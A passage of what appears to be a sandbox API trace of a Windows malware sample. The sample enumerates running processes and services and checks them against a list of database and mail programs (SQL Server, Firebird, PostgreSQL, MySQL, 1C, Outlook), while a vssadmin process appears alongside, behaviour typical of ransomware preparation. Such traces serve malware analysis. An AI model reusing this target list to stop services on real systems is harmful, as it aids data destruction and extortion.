lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.424] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0040.424] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0040.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0040.424] lstrlenW (lpString="WdiSystemHost") returned 13 [0040.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.424] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0040.424] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0040.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0040.424] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0040.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.424] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0040.424] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0040.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0040.424] lstrlenW (lpString="Winmgmt") returned 7 [0040.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0040.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0040.424] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0040.424] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0040.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0040.424] lstrlenW (lpString="WPDBusEnum") returned 10 [0040.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.424] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0040.424] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0040.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0040.424] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0040.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0040.427] Process32FirstW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.427] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.428] lstrlenW (lpString="System") returned 6 [0040.428] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0040.428] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0040.428] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0040.428] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0040.428] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0040.428] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0040.428] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0040.428] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.429] lstrlenW (lpString="smss.exe") returned 8 [0040.429] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0040.429] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0040.429] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0040.429] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0040.429] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0040.429] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0040.429] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0040.429] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.430] lstrlenW (lpString="csrss.exe") returned 9 [0040.430] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.430] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0040.430] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0040.430] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0040.430] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0040.430] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0040.430] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0040.430] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.430] lstrlenW (lpString="wininit.exe") returned 11 [0040.430] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0040.430] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0040.430] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0040.430] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0040.431] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0040.431] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0040.431] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0040.431] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.431] lstrlenW (lpString="csrss.exe") returned 9 [0040.431] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.431] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.432] lstrlenW (lpString="winlogon.exe") returned 12 [0040.432] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.433] lstrlenW (lpString="services.exe") returned 12 [0040.433] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.434] lstrlenW (lpString="lsass.exe") returned 9 [0040.434] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.434] lstrlenW (lpString="lsm.exe") returned 7 [0040.434] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.435] lstrlenW (lpString="svchost.exe") returned 11 [0040.435] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.435] lstrlenW (lpString="svchost.exe") returned 11 [0040.436] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.436] lstrlenW (lpString="svchost.exe") returned 11 [0040.436] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.437] lstrlenW (lpString="svchost.exe") returned 11 [0040.437] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.437] lstrlenW (lpString="svchost.exe") returned 11 [0040.437] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0040.438] lstrlenW (lpString="audiodg.exe") returned 11 [0040.438] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.439] lstrlenW (lpString="svchost.exe") returned 11 [0040.439] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.439] lstrlenW (lpString="svchost.exe") returned 11 [0040.439] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0040.440] lstrlenW (lpString="dwm.exe") returned 7 [0040.440] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0040.441] lstrlenW (lpString="explorer.exe") returned 12 [0040.441] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0040.441] lstrlenW (lpString="spoolsv.exe") returned 11 [0040.441] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.442] lstrlenW (lpString="taskhost.exe") returned 12 [0040.442] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.442] lstrlenW (lpString="svchost.exe") returned 11 [0040.442] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0040.443] lstrlenW (lpString="taskeng.exe") returned 11 [0040.443] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.444] lstrlenW (lpString="taskhost.exe") returned 12 [0040.444] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0040.444] lstrlenW (lpString="entrepreneur.exe") returned 16 [0040.444] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0040.445] lstrlenW (lpString="andrew kinds.exe") returned 16 [0040.445] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0040.446] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0040.446] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0040.446] lstrlenW (lpString="educated.exe") returned 12 [0040.446] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0040.447] lstrlenW (lpString="servers.exe") returned 11 [0040.447] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0040.448] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0040.448] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0040.448] lstrlenW (lpString="gbp_chair.exe") returned 13 [0040.448] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0040.449] lstrlenW (lpString="attention infected.exe") returned 22 [0040.449] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0040.871] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0040.871] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0040.872] lstrlenW (lpString="pattern amateur.exe") returned 19 [0040.872] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0040.872] lstrlenW (lpString="referral.exe") returned 12 [0040.873] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0040.873] lstrlenW (lpString="copyingseems.exe") returned 16 [0040.873] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0040.874] lstrlenW (lpString="spin generally.exe") returned 18 [0040.874] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0040.874] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0040.875] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0040.875] lstrlenW (lpString="transmit.exe") returned 12 [0040.875] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0040.876] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0040.876] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0040.876] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0040.877] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0040.877] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0040.877] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0040.878] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0040.878] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0040.878] lstrlenW (lpString="delight.exe") returned 11 [0040.878] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0040.879] lstrlenW (lpString="within enquiry.exe") returned 18 [0040.879] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0040.880] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0040.880] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0040.880] lstrlenW (lpString="agent1c.exe") returned 11 [0040.880] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0040.881] lstrlenW (lpString="cmd.exe") returned 7 [0040.881] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0040.882] lstrlenW (lpString="conhost.exe") returned 11 [0040.882] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0040.882] lstrlenW (lpString="vssadmin.exe") returned 12 [0040.882] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0040.883] lstrlenW (lpString="VSSVC.exe") returned 9 [0040.883] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0040.884] CloseHandle (hObject=0x17c) returned 1 [0040.884] Sleep (dwMilliseconds=0x1f4) [0041.749] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37209e8 [0041.749] EnumServicesStatusExW (in: hSCManager=0x37209e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0041.749] GetLastError () returned 0xea [0041.750] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x123e) returned 0x3800fb0 [0041.750] EnumServicesStatusExW (in: hSCManager=0x37209e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x123e, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0041.750] CloseServiceHandle (hSCObject=0x37209e8) returned 1 [0041.750] lstrlenW (lpString="Appinfo") returned 7 [0041.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0041.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0041.750] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0041.750] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0041.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0041.751] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0041.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.751] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 